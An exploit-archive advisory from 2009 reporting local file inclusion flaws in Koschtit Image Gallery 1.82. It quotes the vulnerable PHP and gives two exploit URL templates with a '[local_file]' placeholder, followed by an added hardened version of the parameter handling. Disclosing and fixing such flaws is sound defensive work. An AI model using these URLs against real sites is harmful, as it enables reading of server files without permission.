
Koschtit Image Gallery 1.82 Multiple Local File Inclusion Vulnerabilities

Author: ahmadbady
Risk: Security Risk Unsorted
0day-ID: 0day-ID-4986
Category: web applications
Date added: 31-03-2009
Platform: unsorted
=========================================================================
Koschtit Image Gallery 1.82 Multiple Local File Inclusion Vulnerabilities
=========================================================================


                      :local file include:
   
#############################
script: koschtit_image_gallery(v1.82)
   
##############################################################
download from: http://koschtit.tabere.net/download/
or http://koschtit.tabere.net/en/#getit
   
##############################################################
vul:/ki_base/ki_makepic.php


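// 'file' comes from the query string and is joined to the gallery path unchecked
if(isset($_GET['file'])) 
 $file = "../ki_galleries/".$_GET['file'];
else
 exit();

// the text before the first "/" of the same parameter becomes part of an include path
$gallery = substr($_GET['file'], 0, strpos($_GET['file'], "/"));
if(is_file("../ki_config/".$gallery."_ki_setup.php"))
 include_once("../ki_config/".$gallery."_ki_setup.php");

// the unvalidated path is then opened by getimagesize()
$imgsize = getimagesize($file); 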

#############
vul:/ki_base/ki_nojsdisplayimage.php

// same pattern: $gallery is derived from the request parameter and used in include_once()
$gallery = substr($_GET['file'], 0, strpos($_GET['file'], "/"));

include_once("../ki_config/ki_setup.php");
if(is_file(".../ki_config/".$gallery."_ki_setup.php")){
 include_once("../ki_config/".$gallery."_ki_setup.php");
}
.
.
$srcfile = "../ki_galleries/".$file;
$imgsize = getimagesize("../ki_galleries/".$file);

##############################################################
xpl:
path/ki_base/ki_makepic.php?file=[local_file]
path/ki_base/ki_nojsdisplayimage.php?file=[local_file]  
------------------------------------------------------------
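
A hardened version of the parameter handling shown in the two snippets above, as an added example that is not part of the advisory or of Koschtit's own code. The function name `ki_resolve_request`, the allowed character sets and the assumption that the script sits in `ki_base/` next to `ki_galleries/` and `ki_config/` are illustrative.

```php
<?php
// Added example (not Koschtit's code). Directory names follow the advisory's
// snippets; the function name and allowlist patterns are assumptions.
function ki_resolve_request(string $param, string $baseDir): ?array
{
    // Reject NUL bytes and backslashes, then require exactly "gallery/image".
    if (strpbrk($param, "\0\\") !== false) {
        return null;
    }
    $parts = explode('/', $param);
    if (count($parts) !== 2) {
        return null;
    }
    [$gallery, $image] = $parts;

    // Allowlist: fixed character set, so "." and ".." segments cannot pass.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $gallery) ||
        !preg_match('/\A[A-Za-z0-9_-]{1,128}\.(?:jpe?g|png|gif)\z/i', $image)) {
        return null;
    }

    // Canonicalise and confirm the image still lives under ki_galleries/.
    $root = realpath($baseDir . '/ki_galleries');
    if ($root === false) {
        return null;
    }
    $path = realpath($root . '/' . $gallery . '/' . $image);
    if ($path === false ||
        strncmp($path, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }

    // The per-gallery setup file name is built only from the validated name.
    $setup = $baseDir . '/ki_config/' . $gallery . '_ki_setup.php';
    return ['image' => $path, 'setup' => is_file($setup) ? $setup : null];
}

// A non-string value such as file[]=x is rejected before any path is built.
$raw = $_GET['file'] ?? null;
$req = is_string($raw) ? ki_resolve_request($raw, dirname(__DIR__)) : null;
if ($req === null) {
    http_response_code(400);
    exit();
}
if ($req['setup'] !== null) {
    include_once $req['setup'];
}
$imgsize = getimagesize($req['image']);
```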



